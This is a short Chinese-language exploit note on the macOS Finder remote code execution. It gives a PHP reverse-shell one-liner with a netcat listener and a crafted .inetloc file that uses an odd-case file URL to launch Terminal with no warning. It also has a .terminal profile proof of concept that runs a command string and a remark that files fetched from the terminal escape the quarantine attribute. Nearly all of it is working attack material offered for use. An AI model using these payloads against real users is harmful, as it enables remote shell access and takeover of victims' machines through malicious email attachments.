MacOS Finder 邮件 Rce验证

mac反弹&监听

macos 自带php及python

php -r '$sock=fsockopen("10.10.0.4",7777);exec("/bin/sh -i <&3 >&3 2>&3");'

nc -l 7777

payload

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
<plist version="1.0">
  <dict>
    <key>URL</key>
    <string>FiLe:////////////////////////System/Applications/Utilities/Terminal.app</string>
  </dict>
</plist>

保存为word.inetloc

双击附件,不会弹出任何警告

payload2

https://objectivebythesea.com/v3/talks/OBTS_v3_vMetnew.pdf

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
<plist version="1.0">
<dict>
	<key>CommandString</key>
	<string>echo "Hello"</string>
	<key>ProfileCurrentVersion</key>
	<string>2.06000000001</string>
  <key>RunCommandAsShell</key>
  <false/>
  <key>name</key>
  <string>poc</string>
  <key>type</key>
  <string>Window Settings</string>
</dict>
</plist>

保存为1.terminal

从终端下下载回来的文件不会被标记quarantine属性

其余如TG、QQ、WeChat、邮件等军备被标记quarantine属性，运行出现安全提示

参考资料： https://ssd-disclosure.com/ssd-advisory-macos-finder-rce/